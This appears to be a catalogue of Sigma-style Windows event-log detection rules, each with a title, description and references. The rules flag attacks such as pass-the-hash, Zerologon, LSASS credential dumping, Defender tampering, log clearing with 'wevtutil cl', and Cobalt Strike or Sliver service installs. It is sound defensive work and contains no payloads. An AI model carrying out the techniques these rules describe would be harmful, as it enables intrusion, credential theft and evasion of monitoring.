A Member Was Added to a Security-Enabled Global Group Detects activity when a member is added to a security-enabled global group https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632
A Security-Enabled Global Group Was Deleted Detects activity when a security-enabled global group is deleted https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634
External Remote RDP Logon from Public IP Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port. https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html, https://twitter.com/Purp1eW0lf/status/1616144561965002752
Pass the Hash Activity 2 Detects the attack technique pass the hash which is used to move laterally inside the network https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events, https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis, https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/
External Remote SMB Logon from Public IP Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port. https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html, https://twitter.com/Purp1eW0lf/status/1616144561965002752
Failed Logon From Public IP Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625
Potential Privilege Escalation via Local Kerberos Relay over LDAP Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges. https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g, https://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38
Outgoing Logon with New Credentials Detects logon events that specify new credentials https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf
RottenPotato Like Attack Pattern Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like https://twitter.com/SBousseaden/status/1195284233729777665
Successful Account Login Via WMI Detects successful logon attempts performed with WMI Internal Research
Windows Filtering Platform Blocked Connection From EDR Agent Binary Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events. https://github.com/netero1010/EDRSilencer, https://github.com/amjcyber/EDRNoiseMaker, https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983
Microsoft Defender Blocked from Loading Unsigned DLL Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
Unsigned Binary Loaded From Suspicious Location Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv
HybridConnectionManager Service Running Rule to detect the Hybrid Connection Manager service running on an endpoint. https://twitter.com/Cyb3rWard0g/status/1381642789369286662
Suspicious Application Installed Detects suspicious application installed by looking at the added shortcut to the app resolver cache https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3
Suspicious Rejected SMB Guest Logon From IP Detects an attempt to exploit PrintNightmare (CVE-2021-1675), a remote code execution vulnerability in the Windows Spooler Service https://twitter.com/KevTheHermit/status/1410203844064301056, https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare
Sysmon Application Crashed Detects application popup reporting a failure of the Sysmon service https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36
NTLMv1 Logon Between Client and Server Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware. https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml
Active Directory Certificate Services Denied Certificate Enrollment Request Detects denied requests by Active Directory Certificate Services. Examples of reasons for these denials include issues with permissions on the certificate template or invalid signatures. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10), https://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/
DHCP Server Error Failed Loading the CallOut DLL This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
DHCP Server Loaded the CallOut DLL This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
Potential CVE-2021-42287 Exploitation Attempt The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/
Local Privilege Escalation Indicator TabTip Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode https://github.com/antonioCoco/JuicyPotatoNG
Eventlog Cleared One of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
Important Windows Eventlog Cleared Detects the clearing of one of the Windows core event logs, e.g. caused by "wevtutil cl" command execution https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
KDC RC4-HMAC Downgrade CVE-2022-37966 Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d
Certificate Use With No Strong Mapping Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing. https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
No Suitable Encryption Key Found For Generating Kerberos Ticket Detects errors when a target server doesn't have suitable keys for generating Kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7, which has DES encryption for Kerberos authentication disabled. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10), https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled
Critical Hive In Suspicious Location Access Bits Cleared Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system-like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not been recognized within the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior. https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md
Volume Shadow Copy Mount Detects volume shadow copy mount via Windows event log https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (possibly many false positives with this event) are created. Moreover, it appears the directory \Users\TEMP may be created during the exploitation. Viewed on 2008 Server https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html
Windows Update Error Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed. https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml
Zerologon Exploitation Using Well-known Tools This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname. https://www.secura.com/blog/zero-logon, https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382
Vulnerable Netlogon Secure Channel Connection Allowed Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472. https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
NTFS Vulnerability Exploitation Detects the exploitation of an NTFS vulnerability, as reported without many details via Twitter https://twitter.com/jonasLyk/status/1347900440000811010, https://twitter.com/wdormann/status/1347958161609809921, https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/
Windows Defender Threat Detection Service Disabled Detects when the "Windows Defender Threat Protection" service is disabled. https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
CobaltStrike Service Installations - System Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement https://www.sans.org/webcasts/119395, https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
smbexec.py Service Installation Detects the use of smbexec.py tool by detecting a specific service installation https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/, https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296, https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60
Invoke-Obfuscation CLIP+ Launcher - System Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation - System Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher - System Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher - System Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION - System Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin - System Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER - System Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip - System Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA - System Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 - System Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
KrbRelayUp Service Installation Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings) https://github.com/Dec0ne/KrbRelayUp
Credential Dumping Tools Service Execution - System Detects well-known credential dumping tools execution via service execution events https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Meterpreter or Cobalt Strike Getsystem Service Installation - System Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
Moriya Rootkit - System Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
PowerShell Scripts Installed as Services Detects a PowerShell script installed as a service https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Anydesk Remote Access Software Service Installation Detects the installation of the AnyDesk software service, which could be an indication of AnyDesk abuse if the software isn't already used in your environment. https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
CSExec Service Installation Detects CSExec service installation and execution events https://github.com/malcomvetter/CSExec
HackTool Service Registration or Execution Detects installation or execution of services Internal Research
Mesh Agent Service Installation Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
NetSupport Manager Service Install Detects NetSupport Manager service installation on the target system. http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf
PAExec Service Installation Detects PAExec service installation https://www.poweradmin.com/paexec/
New PDQDeploy Service - Server Side Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm
New PDQDeploy Service - Client Side Detects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1 https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm
ProcessHacker Privilege Elevation Detects a ProcessHacker tool that elevated privileges to a very high level https://twitter.com/1kwpeter/status/1397816101455765504
RemCom Service Installation Detects RemCom service installation and execution events https://github.com/kavika13/RemCom/
Remote Access Tool Services Have Been Installed - System Detects service installation of different remote access tool software. This software is often abused by threat actors to perform https://redcanary.com/blog/misbehaving-rats/
Remote Utilities Host Service Install Detects Remote Utilities Host service installation on the target system. https://www.remoteutilities.com/support/kb/host-service-won-t-start/
Sliver C2 Default Service Installation Detects known malicious service installations that appear in cases in which Sliver implants execute the PsExec commands https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231, https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
Service Installed By Unusual Client - System Detects a service installed by a client which has PID 0 or whose parent has PID 0 https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html
Suspicious Service Installation Detects suspicious service installation commands Internal Research
PsExec Service Installation Detects PsExec service installation and execution events https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
Tap Driver Installation Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers
TacticalRMM Service Installation Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
Uncommon Service Installation Image Path Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc. Internal Research
Important Windows Service Terminated With Error Detects important or interesting Windows services that got terminated for whatever reason https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/
Windows Service Terminated With Error Detects Windows services that got terminated for whatever reason https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/
Important Windows Service Terminated Unexpectedly Detects important or interesting Windows services that got terminated unexpectedly. https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
RTCore Suspicious Service Installation Detects the installation of the RTCore service, which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp
Service Installation in Suspicious Folder Detects service installation in suspicious folder appdata Internal Research
Service Installation with Suspicious Folder Pattern Detects service installation with suspicious folder patterns Internal Research
Suspicious Service Installation Script Detects suspicious service installation scripts Internal Research
Potential RDP Exploit CVE-2019-0708 Detects a suspicious error on the RDP protocol, a potential indicator of CVE-2019-0708 https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708, https://github.com/Ekultek/BlueKeep
Scheduled Task Executed From A Suspicious Location Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or is an unusual program to be run from a Scheduled Task Internal Research
Scheduled Task Executed Uncommon LOLBIN Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task Internal Research
Important Scheduled Task Deleted Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/
Ngrok Usage with Remote Desktop Service Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg, https://ngrok.com/
Windows Defender Grace Period Expired Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled. https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/
LSASS Access Detected via Attack Surface Reduction Detects Access to LSASS Process https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction
PSExec and WMI Process Creations Block Detects blocking of process creations originating from PSExec and WMI commands https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands, https://twitter.com/duff22b/status/1280166329660497920
Windows Defender Exclusions Added Detects the setting of Windows Defender exclusions https://twitter.com/_nullbind/status/1204923340810543109
Windows Defender Exploit Guard Tamper Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications" https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
Windows Defender Submit Sample Feature Disabled Detects disabling of the "Automatic Sample Submission" feature of Windows Defender. https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide, https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware
Windows Defender Malware And PUA Scanning Disabled Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/
Windows Defender Malware Detection History Deletion Windows Defender logs when the history of detected infections is deleted. https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus, https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e
Windows Defender AMSI Trigger Detected Detects triggering of AMSI by Windows Defender. https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps
Windows Defender Real-time Protection Disabled Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a "medium" level if this occurs too many times in your environment https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/
Windows Defender Real-Time Protection Failure/Restart Detects issues with Windows Defender Real-Time Protection features Internal Research, https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/, https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346
Win Defender Restored Quarantine File Detects the restoration of files from the defender quarantine https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
Windows Defender Configuration Changes Detects suspicious changes to the Windows Defender configuration https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide, https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware
Microsoft Defender Tamper Protection Trigger Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring" https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection, https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
Windows Defender Threat Detected Detects actions taken by Windows Defender malware detection engines https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus
Windows Defender Virus Scanning Feature Disabled Detects disabling of the Windows Defender virus scanning feature https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/
WMI Persistence Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. https://twitter.com/mattifestation/status/899646620148539397, https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
HackTool - CACTUSTORCH Remote Thread Creation Detects remote thread creation from CACTUSTORCH as described in references. https://twitter.com/SBousseaden/status/1090588499517079552, https://github.com/mdsecactivebreach/CACTUSTORCH
HackTool - Potential CobaltStrike Process Injection Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f, https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
Remote Thread Created In KeePass.EXE Detects remote thread creation in "KeePass.exe" which could indicate potential password dumping activity https://www.cisa.gov/uscert/ncas/alerts/aa20-259a, https://github.com/denandz/KeeFarce, https://github.com/GhostPack/KeeThief
Remote Thread Creation In Mstsc.Exe From Suspicious Location Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials. https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25
Potential Credential Dumping Attempt Via PowerShell Remote Thread Detects remote thread creation by PowerShell processes into "lsass.exe" https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Password Dumper Remote Thread in LSASS Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events. https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm
Remote Thread Creation Via PowerShell In Uncommon Target Detects the creation of a remote thread from a Powershell process in an uncommon target process https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
Rare Remote Thread Creation By Uncommon Source Image Detects uncommon processes creating remote threads. Personal research, statistical analysis, https://lolbas-project.github.io
Remote Thread Created In Shell Application Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE". It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes. https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/, https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/
Remote Thread Creation By Uncommon Source Image Detects uncommon processes creating remote threads. Personal research, statistical analysis, https://lolbas-project.github.io
Remote Thread Creation In Uncommon Target Image Detects uncommon target processes for remote thread creation https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection
Remote Thread Creation Ttdinject.exe Proxy Detects a remote thread creation of Ttdinject.exe used as proxy https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/
Creation Of a Suspicious ADS File Outside a Browser Download Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/
Hidden Executable In NTFS Alternate Data Stream Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash https://twitter.com/0xrawsec/status/1002478725605273600?s=21
Suspicious File Download From File Sharing Websites - File Stream Detects the download of suspicious file type from a well-known file and paste sharing domain https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
Unusual File Download From File Sharing Websites - File Stream Detects the download of suspicious file type from a well-known file and paste sharing domain https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
HackTool Named File Stream Created Detects the creation of a named file stream with the imphash of a well-known hack tool https://github.com/gentilkiwi/mimikatz, https://github.com/topotam/PetitPotam, https://github.com/ohpe/juicy-potato, https://github.com/antonioCoco/RoguePotato, https://www.tarasco.org/security/pwdump_7/, https://github.com/fortra/nanodump, https://github.com/codewhitesec/HandleKatz, https://github.com/xuanxuan0/DripLoader, https://github.com/hfiref0x/UACME, https://github.com/outflanknl/Dumpert, https://github.com/wavestone-cdt/EDRSandblast
Exports Registry Key To an Alternate Data Stream Exports the target Registry key and hides it in the specified alternate data stream. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Unusual File Download from Direct IP Address Detects the download of suspicious file type from URLs with IP https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md, https://labs.withsecure.com/publications/detecting-onenote-abuse
Potential Suspicious Winget Package Installation Detects potential suspicious winget package installation from a suspicious source. https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Potentially Suspicious File Download From ZIP TLD Detects the download of a file with a potentially suspicious extension from a .zip top level domain. https://twitter.com/cyb3rops/status/1659175181695287297, https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/
DNS Query for Anonfiles.com Domain - Sysmon Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
AppX Package Installation Attempts Via AppInstaller.EXE Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL https://twitter.com/notwhickey/status/1333900137232523264, https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/
